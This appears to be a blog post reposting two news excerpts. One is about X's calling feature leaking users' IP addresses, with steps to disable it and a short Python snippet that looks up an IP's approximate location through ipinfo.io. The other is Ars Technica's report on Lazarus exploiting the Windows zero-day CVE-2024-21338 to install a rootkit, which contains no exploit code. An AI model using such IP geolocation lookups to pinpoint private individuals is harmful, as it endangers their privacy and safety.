Privacy researchers also sounded the alarm on the feature after learning that it revealed users’ IP addresses during calls. Notably, the option to protect users’ IP addresses is toggled off by default, which frankly makes no sense.

Zach Edwards, an independent privacy researcher, told Gizmodo that an IP address can allow third parties to track down your location and get their hands on other details of your online life.

“In major cities, an IP address can sometimes identify someone’s exact location, but usually it’s just close enough to be creepy. Like a 1 block radius around your house,” Edwards said via X direct messages. However, “sometimes if in a remote/rural location, the IP address 1000% identifies you.”

Law enforcement can use IP addresses to track down illegal behavior, such as child sexual abuse material or pirating online content. Meanwhile, hackers can launch DDoS attacks to take down your internet connection or even steal your data.
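
To see how little effort Edwards’ point takes in practice, the sketch below asks a public geolocation service for the rough whereabouts of an IP address. ipinfo.io is used purely as an example provider; accuracy varies exactly as he describes, from block-level in cities to effectively pinpoint in rural areas.

```python
import json
import urllib.request

def rough_location(ip: str) -> dict:
    # ipinfo.io is just one example of a public geolocation service;
    # unauthenticated requests are rate-limited.
    with urllib.request.urlopen(f"https://ipinfo.io/{ip}/json") as resp:
        data = json.load(resp)
    return {k: data.get(k) for k in ("city", "region", "country", "org", "loc")}

print(rough_location("8.8.8.8"))  # city/region/country plus a lat,long estimate
```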

How to turn off audio and video calls on X

Luckily, you can avoid potential IP security nightmares by turning off audio and video calls on X. As the steps below show, it’s pretty straightforward:

– First, go to Settings and Support. Then click on Settings and Privacy. (If you’re on desktop, click on the More button and then go to Settings and Privacy).

– Next, click on Privacy and Safety. Select Direct Messages from the menu that pops up.

– Toggle off the option that says Enable audio and video calling.

Screenshot: how to disable audio and video calling on X (credit: Oscar Gonzalez)

And that’s it. Some may not see the Enable audio and video calling option in their settings yet, which means the feature hasn’t been rolled out to them. That doesn’t mean they won’t eventually get it in a future update.

Source: How to Prevent X’s Audio and Video Calls Feature From Revealing Your IP Address

Hackers exploited Windows 0-day for 6 months after Microsoft knew of it

[…]

Even after Microsoft patched the vulnerability last month, the company made no mention that the North Korean threat group Lazarus had been using the vulnerability since at least August to install a stealthy rootkit on vulnerable computers. The vulnerability provided an easy and stealthy means for malware that had already gained administrative system rights to interact with the Windows kernel. Lazarus used the vulnerability for just that. Even so, Microsoft has long said that such admin-to-kernel elevations don’t represent the crossing of a security boundary, a possible explanation for the time Microsoft took to fix the vulnerability.

A rootkit “holy grail”

“When it comes to Windows security, there is a thin line between admin and kernel,” Jan Vojtěšek, a researcher with security firm Avast, explained last week. “Microsoft’s security servicing criteria have long asserted that ‘[a]dministrator-to-kernel is not a security boundary,’ meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel.”

The Microsoft policy proved to be a boon to Lazarus in installing “FudModule,” a custom rootkit that Avast said was exceptionally stealthy and advanced.

[…]

In years past, Lazarus and other threat groups have reached this last threshold mainly by exploiting third-party system drivers, which by definition already have kernel access. To work with supported versions of Windows, third-party drivers must first be digitally signed by Microsoft to certify that they are trustworthy and meet security requirements. In the event Lazarus or another threat actor has already cleared the admin hurdle and has identified a vulnerability in an approved driver, they can install it and exploit the vulnerability to gain access to the Windows kernel. This technique—known as BYOVD (bring your own vulnerable driver)—comes at a cost, however, because it provides ample opportunity for defenders to detect an attack in progress.

The vulnerability Lazarus exploited, tracked as CVE-2024-21338, offered considerably more stealth than BYOVD because it exploited appid.sys, a driver enabling the Windows AppLocker service, which comes preinstalled in the Microsoft OS. Avast said such vulnerabilities represent the “holy grail,” as compared to BYOVD.

In August, Avast researchers sent Microsoft a description of the zero-day, along with proof-of-concept code demonstrating what it did when exploited. Microsoft didn’t patch the vulnerability until last month. Even then, the disclosure that CVE-2024-21338 was being actively exploited, along with the details of the Lazarus rootkit, came not from Microsoft’s February patch release but from Avast 15 days later. A day later, Microsoft updated its patch bulletin to note the exploitation.

[…]

Source: Hackers exploited Windows 0-day for 6 months after Microsoft knew of it | Ars Technica